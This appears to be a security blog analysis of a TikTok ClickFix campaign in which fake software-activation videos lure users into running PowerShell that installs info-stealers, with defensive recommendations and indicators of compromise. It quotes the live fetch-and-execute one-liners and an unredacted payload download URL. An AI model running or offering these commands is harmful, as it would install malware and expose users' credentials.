# Trend 'free software activation' on TikTok – a gateway for malware to enter your device

TikTok is known as a social media platform for sharing short videos, allowing users to create, edit, and share videos ranging from a few seconds to a few minutes, often with music, effects, and creative filters. As of 2025, the platform has attracted **over 1.5 billion monthly active users across 150 countries** and supports more than **75 languages**.

![Beware of Trending TikTok Videos Promoting Pirated Apps That Deliver ...](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLu5F27piG4f16DyM0Uk-LqJRiArgX4mYRPe88NihkGS4eR05tyRjy_OifezfxHBfHtFRaOMQiR6zL-sKgod9WFaiUvLalNYuIamfJw9sLu3HvQH5S805E63HUMKd2Nn9_EHH1ymXmqphHuv1guI5VBLyznlABBm2aLfSFpcEanbTCU_5YnEQ-0ZvCoec/s16000/TikTok.webp align="center")

Due to its continuous popularity, cybercriminal groups are exploiting TikTok's viral nature to post fake "tutorial" videos (often AI-generated or deepfake) that urge viewers to execute a command on their device (e.g., PowerShell) to install fake software (cracks, activations, or "free" apps). When users copy and run that command, it downloads and executes info-stealers or loaders like **Vidar, StealC, Latrodectus**—a variant of the **“ClickFix” or “Click-to-fix”** tactic. The concerning issue is that these scam videos often attract hundreds of thousands of views, posing a significant threat to information systems.

In this article, we will discuss a method of spreading malware through Windows PowerShell by instructing users to crack Adobe software, which is very popular in the market.

![](https://isc.sans.edu/diaryimages/images/isc-20251017-1.png align="center")

## **How Attackers Execute**

As mentioned earlier, attackers continue to exploit two common attack techniques: **“ClickFix” or “Click-to-fix”** to initiate their campaigns. First, the attacker distributes videos instructing users to update **CapCut** or perform **Crack Adobe** via TikTok, attracting a significant number of viewers.

* “[https://vm.tiktok.com/ZGdaCkbEF/“](https://vm.tiktok.com/ZGdaCkbEF/“)
    
* [https://vm.tiktok.com/ZGdaX8jVq/](https://vm.tiktok.com/ZGdaX8jVq/)
    

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760892593260/6a864802-c129-4b04-b983-b772d0e32cd4.png align="center")

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760892808735/bbacf4f1-07b3-4eb0-b49c-78d4f248341d.png align="center")

Both tutorial videos use the same trick by instructing users to open **Windows PowerShell** and run it as an **Administrator**. This not only executes commands quickly but also allows:

* Editing the system **registry**.
    
* Managing **services, drivers, and processes of others**.
    
* Accessing **system directories** (`C:\Windows\System32`, `C:\Program Files`, …).
    
* Installing software, modules, or changing policies (`Set-ExecutionPolicy`, `Install-Module`, …).
    

After opening PowerShell and running it as Administrator, the attacker tricks the user into executing a command:

* `powershelliex (irm` [`slmgr.win/photoshop`](http://slmgr.win/photoshop)`)` - Đối với những người dùng muốn Crack phần mềm Adobe
    
* `powershelliex (irm` [`slmgr.win/capcut`](http://slmgr.win/capcut)`)` - Đối với những người dùng muốn Active phần mềm CapCut
    

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760894384976/e67b8773-2c67-4edc-9b8f-0121422479e9.png align="center")

After the user runs the above commands, it will download a script from [`https://slmgr.win/photoshop`](https://slmgr.win/photoshop) and **execute it directly in memory.** These scam campaigns on TikTok or YouTube have used this exact method to spread malware.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760894929881/dcb4b6c2-7110-4a63-aa5c-10ab7ad551df.png align="center")

Then the malicious code will be downloaded in the next stage and is related to **AuroStealer** from the link: [`https://file-epq.pages.dev/updater.exe`](https://file-epq.pages.dev/updater.exe)

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760970267104/f931a23c-c7c8-476b-9e58-abb4c7d77f52.png align="center")

After the malware is downloaded, it will execute a script to create **a Scheduled Task** to run `powershell.exe` with a command and code (stored in the `$scr` variable) each time the user logs in. Naturally, the task is named with one of the "legitimate/update-like" names (e.g., `MicrosoftEdgeUpdateTaskMachineCore`, `GoogleUpdateTaskMachineCore`, etc.) to disguise itself.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760970037683/18ec307a-dfcb-45cf-8014-cb6cb6fa4728.png align="center")

In summary, this script will execute the **PowerShell payload ($scr) each time the user logs on.** This is a common technique in malware.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760970171943/b4b073b4-b386-4324-9862-815d5cd42719.png align="center")

Finally, another malicious payload will be executed with the name `"source.exe"`.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760970758992/a640e30a-4047-4b75-99c9-395a12511da7.png align="center")

A notable feature of this payload is that it will **execute code in memory (in-memory execution),** which helps avoid writing files to disk and can evade some file-based scanning tools. Additionally, it can **run any payload:** from stealers, loaders, RATs, to data theft, installing backdoors, or lateral movement.

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1760971259876/3702da36-379c-47d8-aee3-909b32b755f7.png align="center")

## **Conclusion**

This campaign has shown that cybercriminal groups are effectively using short video platforms like TikTok and YouTube to deploy in-memory malware, self-compiling through PowerShell. The attackers cleverly exploit TikTok's viral nature to trick users into running commands and scripts (social engineering).

It is effective because it combines strong social engineering with sophisticated techniques (persistence + in-memory execution), significantly reducing the chances of early detection if relying solely on traditional signature scanning. To counteract this, it's necessary to coordinate **technical prevention (EDR, GPO, AppLocker), observation/monitoring (logging + SIEM), and human factors (training, awareness)**.

## **Recommendations**

1. **For Users**
    

* Do not trust "free tips" or "software hacks."
    
* **Do not run commands requested from videos or external links** (especially with admin rights).
    
* **Keep software updated**: The operating system, security software, social media browsers, and applications you use should all be updated to minimize the risk of exploitation from new malware.
    

2. **Recommendations for Organizations and IT Administrators**
    

* **Implement user education and training**: Organizations should have a "phishing awareness" program (phishing, malvertising, social engineering) that includes campaigns like this - using social media videos to lure users into running malware.
    
* **Restrict the ability to run untrusted code in PowerShell**: Use Group Policy to block or control downloading and running scripts from the internet, especially with administrative rights.
    
* **Use EDR/NGAV solutions capable of detecting "self-compiling" behavior or shellcode injection into memory**: The article notes the use of `csc.exe` in stage 2 for compiling code and injecting shellcode.
    
* **Software download policy**: Allow users to download software only from internal sources or approved software repositories, not from social media links or unknown domains.
    

## **IOC**

1. **Link Tiktok**
    
    * hxxps://vm\[.\]tiktok\[.\]com/ZGdaCkbEF/
        
    * hxxps://vm\[.\]tiktok\[.\]com/ZGdaC7EQY/
        
    * hxxps://vm\[.\]tiktok\[.\]com/ZGdaX8jVq/
        
2. **Domain**
    
    * [https://file-epq.pages.dev/updater.exe](https://file-epq.pages.dev/updater.exe)
        
    * slmgr\[.\]win/photoshop
        
    * slmgr\[.\]win/capcut
        
3. **Hash File**
    
    * 6D897B5661AA438A96AC8695C54B7C4F3A1FBF1B628C8D2011E50864860C6B23
        
    * db57e4a73d3cb90b53a0b1401cb47c41c1d6704a26983248897edcc13a367011
        
    * 58b11b4dc81d0b005b7d5ecae0fb6ddb3c31ad0e7a9abf9a7638169c51356fd8
        

## **Reference**

1. [TikTok Videos Weaponized to Deliver Self-Compiling PowerShell Malware](https://gbhackers.com/tiktok-videos/)
    
2. [TikTok Videos Promoting Malware Installation - SANS ISC](https://isc.sans.edu/diary/32380)
